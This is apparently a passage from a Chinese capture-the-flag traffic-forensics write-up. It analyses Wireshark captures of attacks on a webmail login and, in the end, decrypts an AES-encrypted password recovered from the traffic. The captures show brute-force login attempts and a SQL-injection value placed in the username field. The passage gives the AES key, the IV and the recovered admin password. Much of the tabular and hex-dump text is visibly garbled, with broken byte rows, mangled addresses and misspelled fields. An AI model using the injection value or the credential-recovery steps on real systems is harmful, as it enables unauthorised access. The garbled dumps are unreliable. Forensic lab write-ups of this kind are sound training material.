| Time         Source         Destination         Protocol         Length         Tais           52221 3305.942_192.168_1         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168         192.168 <th></th>                                                                                                    |               |
| 52304 3306.455_ 192.168 192.168 HTTP 527 POST /webmail/admin/index.php?action=login&module=admin&return=/webmail/admin/index.php HTTP/1.1 (application/x-www-form=urlencoded)                                                                                                    |               |
| + 52312 3306.542 192.168 192.168 HTTP 663 POST /webmail/admin/index.php?action=login&module=admin&return=/webmail/admin/index.php HTTP/1.1 (application/x-www-form-urlencoded)                                                                                                    |               |
| 52314 3306.542_ 192.168 HTTP 614 POST /webmail/admin/index.php?action=login&module=admin&return=/webmail/admin/index.php HTTP/1.1 (application/x-www-form-urlencoded)                                                                                                    |               |
| > Frame 52312: 663 bytes on wire (5304 bits), 663 bytes captured (5304 bits) > Ethernet II, Src: Hangzhou_39:82:ed (00:99:63:39:42:ed), Dit: Vmware_20:e4:66 (00:0c:29:2d:e4:66) > Internet Protocol Version 4, Src: 192.168.94:59, Dist: 192.168.92.87) > Insansission Control Protocol, Src Port: 13321, Dst Port: 80, Seq: 12103, Ack: 35075, Len: 609 > Hypertext Transfer Protocol > HUL Erond e1: application/x-www-form-urlencoded                                                                                                    |               |
| > Form item: "domain" = "test.com"                                                                                                    |               |
| > Form item: "password" = "g004P455w0+D"<br>> Form item: "type" = "deptadmin"<br>> Form item: "username" = "-1' OR 2+553-553-1=0+0+0+1 "                                                                                                    |               |
|                                                                                                    |               |
| 0010       02 89 65 72 40 90 77 66       93 35 c0 a8 5e b c0 a8       ···ee ··· ·5···5···         0020       02 0b b3 40 90 85 96 47       33 5 c0 a8 5e b c0 a8       ···ee ··· ·5···5···         0021       00 b1 31 00 90 59 47       53 5 4 29 27 77 55 52 66       ···ee ··· ·5···         0030       00 41 30 d3 90 90 59 47       53 54 29 27 77 55 52 66       ···ee ··· ·5···         0030       01 50 27 61 61 63 74 69       66 9 62 75 05 62       ···ee ··· ·5···         0030       01 40 70 37 16 13 74 69       67 69 36 64 67 35 02       all/admin /ndex.         00300       04 61 69 62 75 62 66 06 30 62 76 12 64       moltani /ndex.         00300       04 61 64 75 62 66 73 60 66 92 62 72 63       moltani /ndex.         00300       04 62 62 76 16 64 66 78 02 67 80 72 8       moltani /ndex.         00300       64 69 62 76 16 64 78 06 67 78 02 68 77 80 74 80 min./ndex.       moltani /ndex.         00300       64 69 62 76 16 64 77 56 62 74 65 78 02 66 77 71 71 /1.1·· Content-       moltani /ndex.         00300       64 59 64 74 65 63 20 04 63 36 66 74 62 68 72 20 10 /1.1·· Content-       moltani /ndex.         00300       74 65 66 74 24 54 79 70 70 26 32 a0 24 17 77 22 (atol 77 / 2 catol 77 / 2 catol 77 / 2 catol 77 / 2 catol 77 / 2 catol 77 / 2 catol 77 / 2 catol 77 / 2 catol 77 / 2 catol 77 / 2 catol 77 / 2 catol 77 / 2 catol 77 / 2 catol 77 / 2 catol 77 / 2 catol 77 / 2 catol 77 / 2 catol 77 / 2 catol 77 /                                                                                                    |               |
| Affe. area a transfer to a transfer to a tra | CSDN @Jonny.G |

从上图可以看出,通过过滤语句查询第一个流量包 mailtwo 的时候,都是一些爆破的流量,没有我们需要的东西。 那么接下来就通过过滤语句查询第二个流量包 mailtwo1。

| amailtwo1.pcap                                                                                                    |                                                                                                    | - 0 ×                      |
|----------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------|----------------------------|
| 文件(F) 編輯(E) 视图(V) 跳转(G) 捕获(C) 分析(A) 统计(S) 电活(Y)                                                                                                    | 无线(W) 工具(T) 帮助(H)                                                                                                    |                            |
| ■ ∅ 💿 📴 🖾 🕱 🖆 🔍 ⇔ ⇔ 🕾 🖗 📃 📃 🔍 Q, G                                                                                                    |                                                                                                    |                            |
| (http contains "{\"success\":true}" or http.request.method="POST") and                                                                                                    | ip. addr=192. 168. 94. 59                                                                                                    |                            |
| Bo.         Time         Source         Destination         Protocol Length           5948         59.116897         192.168         192.168         HTTP         368           14463         110.089310         192.168         HTTP         368           14426         10.10.89310         192.168         HTTP         856           15830         150.172017         192.168         192.168         HTTP         368           17126         165.477301         192.168         192.168         HTTP         847           11245         155.20124         192.168         192.168         HTTP         847           11245         155.20124         192.168         192.168         HTTP         368           35485         351.998496         192.168         192.168         HTTP         368 | inio<br>TTP/1.1 200 OK (text/html)<br>OST /webmail/index.php?module=operate&action=login&web=1 HTTP/1.1 (application/x-www-form-urlencoded)<br>OST /webmail/index.php?module=operate&action=login&web=1 HTTP/1.1 (application/x-www-form-urlencoded)<br>(TTP/1.1 200 OK (text/html)<br>OST /webmail/index.php?module=operate&action=login&web=1 HTTP/1.1 (application/x-www-form-urlencoded)<br>[TCP Spurious Retransaission] POST /webmail/index.php?module=operate&action=login&web=1 HTTP/1.1 (application/x-www-form-urlencoded)<br>[TCP Spurious Retransaission] POST /webmail/index.php?module=operate&action=login&web=1 HTTP/1.1 (application/x-www-form-urlencoded)<br>[TCP ACKed unseen segment] [TCP Previous segment not captured] HTTP/1.1 200 OK (text/html)<br>[TCP ACKed unseen segment] HTTP/1.1 200 OK (text/html) | a)                         |
| > Frame 18152: 368 bytes on wire (2944 bits), 368 bytes<br>> Ethernet II, Src: Wmware_2d:e4:66 (00:06:29:2d:e4:66),<br>> Internet Protocol Version 4, Src: 192.168.32.187, Dst:<br>> Transmission Control Protocol, Src Port: 80, Dst Port:                                                                                                    | captured (2944 bits)<br>Dst: Hangzhou_39:42:ed (b0:f9:63:39:42:ed)<br>192.168.94.59<br>1933, Seq: 12049, Ack: 2339, Len: 314                                                                                                    |                            |
| > Hypertext Transfer Protocol                                                                                                    |                                                                                                    |                            |
| Line-based text data: text/html (1 lines)                                                                                                    |                                                                                                    |                            |
|                                                                                                    |                                                                                                    |                            |
| 0000 b0 f9 63 39 42 ed 00 0c 29 2d e4 66 08 00 45 00                                                                                                    |                                                                                                    | ^                          |
| $ \begin{array}{cccccccccccccccccccccccccccccccccccc$                                                                                                    | ^y, P6m 9 . B _ ? YP.        HT TP/1.1 2         00 K/: 5 event: n         ginx/1.5 . 0-Date         : Wed, 08 Aug 20         18 08:23 :12 GMT.         .Content Type: t         ext/html; charse         tutf.3         content type: t         extl/html; charse         tutf.3         tutf.3         .Content type: t         estif.10         .content         .empth: 16Con         nection: Keep-al         iveExp inses: Th         u, 19 No v 1981 0         8:52:00 GMTCac                                                                                                    |                            |
| 0100 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73                                                                                                    | he-Control: no-s                                                                                                    | CSDN-@loghny.g.            |
| w mairiwol. pôsp                                                                                                    | 7991: 1894/92 · E                                                                                                    | 12-1. 0 (0.0%) 首位: Default |

通过查看流量里面的信息,最后两个流量都是表示成功登录的流量,那么倒数第三个流量里面的信息,就包含我们所需要的密码 (登陆成功就不会继续)。

| mailtwo1.pcap                                                                                                    | – a × |
|----------------------------------------------------------------------------------------------------|-------|
| 文件(F) 編織(F) 機関(V) 訓練(G) 捕获(C) 分析(A) 统计(S) 电话(Y) 无线(W) 工具(T) 報助(H)                                                                                                    |       |
| 🛋 🔳 🔬 🛛 📘 🖾 🗙 🖾 🔍 🗢 🗠 🗟 🐺 🛓 🧮 🔍 🔍 🔍 🏛                                                                                                    |       |
| (http contains "{\"success\":true}" or http:request.method="POST") and ip.add==192.180.94.59                                                                                   |       |
| No. Time Source Destination Protocol Length Info                                                                                                    |       |
| 5948 50.116897 192.168 192.168 HTTP 368 HTTP/1.1 200 OK (text/html)                                                                                                    |       |
| 14463 110.089310 192.168 192.168 HTTP 839 POST /webmail/index.php?module=operate&action=login&web=1 HTTP/1.1 (application/x-www-form-urlencoded)                               |       |
| 14826 130.173594 192.168 192.168 HTTP 865 POST /webmail/index.php?module=operate&action=login&web=1 HTTP/1.1 (application/x-www-form-urlencoded)                               |       |
| 15830 150.172017 192.168 192.168 HTTP 368 HTTP/1.1 200 OK (text/html)                                                                                                    |       |
| + 17126 165.477301 192.168 192.168 HTTP 847 POST /webmail/index.php?module=operate&action=login&web=1 HTTP/1.1 (application/x-www-form-urlencoded)                             |       |
| + 17194 165.820184 192.168 192.168 HTTP 847 [TCP Spurious Retransmission] POST /webmail/index.php?module=operate&action=login&web=1 HTTP/1.1 (application/x-www-form-urlencode | ed)   |
| 18152 170.679536 192.168 192.168 HTTP 368 [TCP ACKed unseen segment] [TCP Previous segment not captured] HTTP/1.1 200 0K (text/html)                                           |       |
|                                                                                                    |       |
|                                                                                                    |       |

| 35485 351.998496 192.168 192.168 HTTP 368 [TCP ACKed unseen segment] HTTP/1.1 200 OK (text/html)                                                                                                    |                            |                |
|----------------------------------------------------------------------------------------------------|----------------------------|----------------|
|                                                                                                    |                            |                |
|                                                                                                    |                            |                |
| Seame 17194: 847 butes on vine (6776 hits) 847 butes cantured (6776 hits)                                                                                                    |                            |                |
| Friende LLSet, der bytes off wire (0770 blts), der bytes calutation (0770 blts),<br>Bethennet LLSet, Hanzhou 39742;ed (bet/963-3942;ed), Dst: Wmware 2d:e4:66 (00:0c:29:2d:e4:66)                                                                                                    |                            |                |
| Internet Protocol Version 4. Src: 192.168.94.59. Dst: 192.168.32.187                                                                                                    |                            |                |
| > Transmission Control Protocol, Src Port: 13933, Dst Port: 80, Sea: 490, Ack: 320, Len: 793                                                                                                    |                            |                |
| > Hypertext Transfer Protocol                                                                                                    |                            |                |
| ✓ HTML Form URL Encoded: application/x-www-form-urlencoded                                                                                                    |                            |                |
| > Form item: "username" = "admin"                                                                                                    |                            |                |
| > Form item: "domain" = "test.com"                                                                                                    |                            |                |
| <pre>&gt; Form item: "password" = "+ZgE14UGcFcyRGLI0/ZXPQ=="</pre>                                                                                                    |                            |                |
| > Form item: "captcha" = "OC87"                                                                                                    |                            |                |
| <pre>&gt; Form item: "language" = "zh_CN"</pre>                                                                                                    |                            |                |
| > Form item: "enter" = "true"                                                                                                    |                            |                |
|                                                                                                    |                            |                |
|                                                                                                    |                            |                |
|                                                                                                    |                            |                |
|                                                                                                    |                            |                |
|                                                                                                    |                            |                |
|                                                                                                    |                            |                |
| 00000 00 00 20 2d e4 66 60 49 53 39 42 ed 08 00 45 00 ····+··· 99···E·                                                                                                    |                            | ^              |
| 0010 03 41 40 00 40 00 71 00 D1 41 00 40 50 51 20 00 40 747 (m <sup>-1</sup> ), (m <sup>-1</sup> ), (m <sup>+1</sup> ), (m <sup>+1</sup> ), (m <sup>+1</sup> |                            |                |
| 030 00 43 fd 72 00 00 55 4f 53 54 20 2f 77 65 62 6d - C-rPO ST //webm                                                                                                    |                            |                |
| 0040 61 69 6c 2f 69 6e 64 65 78 2e 70 68 70 3f 6d 6f ail/inde x.php?mo                                                                                                    |                            |                |
| 0050 64 75 6c 65 3d 6f 70 65 72 61 74 65 26 61 63 74 dule=ope rate&act                                                                                                    |                            |                |
| 0060 69 6f 6e 3d 6c 6f 67 69 6e 26 77 65 62 3d 31 20 ion=logi n&web=1                                                                                                    |                            |                |
| 0070 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 HTTP/1.1 -Host:                                                                                                    |                            |                |
| 0080 31 39 32 2e 31 36 38 2e 33 32 2e 31 38 37 0d 0a 192.168 32.187                                                                                                    |                            |                |
| 0090 43 bt be be b5 b5 /4 b9 bt be 3a 20 b0 b5 b5 /0 Connection: Reep                                                                                                    |                            |                |
|                                                                                                    |                            |                |
| 00c0 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d he-Contr ol: max-                                                                                                    |                            |                |
| 00d0 61 67 65 3d 30 0d 0a 4f 72 69 67 69 6e 3a 20 68 age=0··O rigin: h                                                                                                    |                            |                |
| 00e0 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 33 32 ttp://19 2.168.32                                                                                                    |                            |                |
| 00f0 2e 31 38 37 0d 0a 55 70 67 72 61 64 65 2d 49 6e .187. Up grade-In                                                                                                    |                            |                |
| 10100 /3 65 63 /5 /2 65 2d 52 65 /1 /5 65 73 74 73 3a secure-R equests:                                                                                                    |                            | CSDN @Jakrnv.G |
| 💗 🗹 mailtvol. posp                                                                                                    | 分组: 189092 · 已显示: 8 (0.0%) | 1 Defailt      |

从上图可以看到有一个字段的信息是 Form item: "password" = "+ZgE14UGcFcyRGLI0/ZXPQ==",那么这字段包含的就是我们所 需要的密码。

拿到密码后,我们就进行最后一步,进行密码解密。

| AES加密模式: (    | CBC V 填充: zeropaddir | ng 💙 数据块: 128位 🗸 | <b>密码:</b> d959caadac9b1 | 3dcb3e 偏移量: 123 | 34567812345678 | 输出: base64 ✔ | 字符集: | gb2312编码(简体) | ~ |                |
|---------------|----------------------|------------------|--------------------------|-----------------|----------------|--------------|------|--------------|---|----------------|
| +ZgE14UGcFcyF | GLIO/ZXPQ=           |                  |                          |                 |                |              |      |              |   |                |
|               |                      |                  |                          |                 |                |              |      |              |   |                |
|               |                      |                  |                          |                 |                |              |      |              |   |                |
|               |                      |                  |                          |                 |                |              |      |              |   |                |
|               |                      |                  |                          |                 |                |              |      |              |   |                |
| ↑ 将你电脑文件      | 直接拖入试试^-^            |                  |                          |                 | AES加密          | AES解密        |      |              |   |                |
| AES加密、解密转扬    | 换结果(base64了): ြ ¥ ₽  |                  |                          |                 |                |              |      |              |   |                |
| admin!@#PASS1 | .23                  |                  |                          |                 |                |              |      |              |   |                |
|               |                      |                  |                          |                 |                |              |      |              |   |                |
|               |                      |                  |                          |                 |                |              |      |              |   |                |
|               |                      |                  |                          |                 |                |              |      |              |   |                |
|               |                      |                  |                          |                 |                |              |      |              |   |                |
| L             |                      |                  |                          |                 |                |              |      |              |   | CSDN @Johnny.G |

通过上图看到,经过解密之后得到密码: admin!@#PASS123。

### 11、黑客获得的VPN的IP

不太会~~~ (后续会了会更新)